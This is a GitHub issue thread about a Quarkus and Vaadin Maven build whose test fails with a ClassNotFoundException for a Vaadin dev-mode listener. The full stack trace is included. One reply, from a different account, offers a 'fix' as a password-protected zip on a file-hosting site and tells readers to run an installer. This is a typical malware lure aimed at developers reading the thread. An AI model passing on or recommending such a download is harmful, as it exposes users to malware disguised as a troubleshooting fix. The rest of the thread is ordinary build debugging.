### ISSUE TITLE
Exception in mvn build command in test section

### ISSUE THREAD

**Issue by mal-financial-com** [quarkusio/quarkus#42831]
### Describe the bug

I have project with Quarkus 3.9.4  and vaadin 24.3.9 with java 21.

I having troubles with building package, im using this command 
mvn clean package  -Duser.timezone=Europe/Berlin -Pproduction 

Im getting following error on jebkins build pipeline:

```
[INFO] 
[INFO] -------------------------------------------------------
[INFO]  T E S T S
[INFO] -------------------------------------------------------
[INFO] Running com.financial.ricfinder.webapp.db.DBStructureTest
2024-08-28 11:44:34,850 WARN  [io.qua.dep.index] (build-37) Re-indexing /META-INF/jandex.idx - at least Jandex 2.1 must be used to index an application dependency
2024-08-28 11:44:35,557 INFO  [io.qua.arc.pro.BeanProcessor] (build-2) Found unrecommended usage of private members (use package-private instead) in application beans:
	- @PostConstruct callback com.financial.ricfinder.webapp.util.VersionInfo#init(),
	- @Inject field com.financial.ricfinder.webapp.services.odps.OdpsRemotePermissionService#configManager,
	- @Inject field com.financial.ricfinder.webapp.services.odps.OdpsRemotePermissionService#db
	- and 11 more - please enable debug logging to see the full list
[INFO] H2 database started in TCP server mode; server status: TCP server running at tcp://172.17.0.5:9092 (only local connections)
[INFO] H2 database was shut down; server status: Not started
[ERROR] Tests run: 1, Failures: 0, Errors: 1, Skipped: 0, Time elapsed: 5.344 s <<< FAILURE! -- in com.financial.ricfinder.webapp.db.DBStructureTest
[ERROR] com.financial.ricfinder.webapp.db.DBStructureTest -- Time elapsed: 5.344 s <<< ERROR!
java.lang.RuntimeException: java.lang.ExceptionInInitializerError
	at io.quarkus.test.junit.QuarkusTestExtension.throwBootFailureException(QuarkusTestExtension.java:643)
	at io.quarkus.test.junit.QuarkusTestExtension.interceptTestClassConstructor(QuarkusTestExtension.java:727)
	at java.base/java.util.Optional.orElseGet(Optional.java:364)
	at java.base/java.util.ArrayList.forEach(ArrayList.java:1596)
Caused by: java.lang.ExceptionInInitializerError
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:534)
	at java.base/java.lang.Class.forName(Class.java:513)
	at io.quarkus.runner.bootstrap.StartupActionImpl.run(StartupActionImpl.java:269)
	at io.quarkus.test.junit.QuarkusTestExtension.doJavaStart(QuarkusTestExtension.java:252)
	at io.quarkus.test.junit.QuarkusTestExtension.ensureStarted(QuarkusTestExtension.java:610)
	at io.quarkus.test.junit.QuarkusTestExtension.interceptTestClassConstructor(QuarkusTestExtension.java:725)
	... 2 more
Caused by: java.lang.RuntimeException: Failed to start quarkus
	at io.quarkus.runner.ApplicationImpl.<clinit>(Unknown Source)
	... 9 more
Caused by: java.lang.ClassNotFoundException: com.vaadin.base.devserver.startup.DevModeStartupListener
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:641)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:526)
	at io.quarkus.bootstrap.classloading.QuarkusClassLoader.loadClass(QuarkusClassLoader.java:518)
	at io.quarkus.bootstrap.classloading.QuarkusClassLoader.loadClass(QuarkusClassLoader.java:468)
	at io.quarkus.bootstrap.classloading.QuarkusClassLoader.loadClass(QuarkusClassLoader.java:518)
	at io.quarkus.bootstrap.classloading.QuarkusClassLoader.loadClass(QuarkusClassLoader.java:468)
	at java.base/java.lang.Class.forName0(Native Method)
	at java.base/java.lang.Class.forName(Class.java:534)
	at java.base/java.lang.Class.forName(Class.java:513)
	at com.vaadin.base.devserver.startup.DevModeStartupListener_Bean.<init>(Unknown Source)
	at io.quarkus.arc.setup.Default_ComponentsProvider.addBeans4(Unknown Source)
	at io.quarkus.arc.setup.Default_ComponentsProvider.getComponents(Unknown Source)
	at io.quarkus.arc.impl.ArcContainerImpl.<init>(ArcContainerImpl.java:128)
	at io.quarkus.arc.Arc.initialize(Arc.java:38)
	at io.quarkus.arc.runtime.ArcRecorder.initContainer(ArcRecorder.java:49)
	at io.quarkus.deployment.steps.ArcProcessor$initializeContainer1770303700.deploy_0(Unknown Source)
	at io.quarkus.deployment.steps.ArcProcessor$initializeContainer1770303700.deploy(Unknown Source)
	... 10 more
```

Not able to figure out what is the reason behind it.

Could someone help me with it?

**Comment by mal-financial-com** [comment]
build too Im using is eclipse-temurin-21:1.0.1 clean package -Pproduction -Duser.timezone=Europe/Berlin

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mal-financial-com** [comment]
version conflict I guess
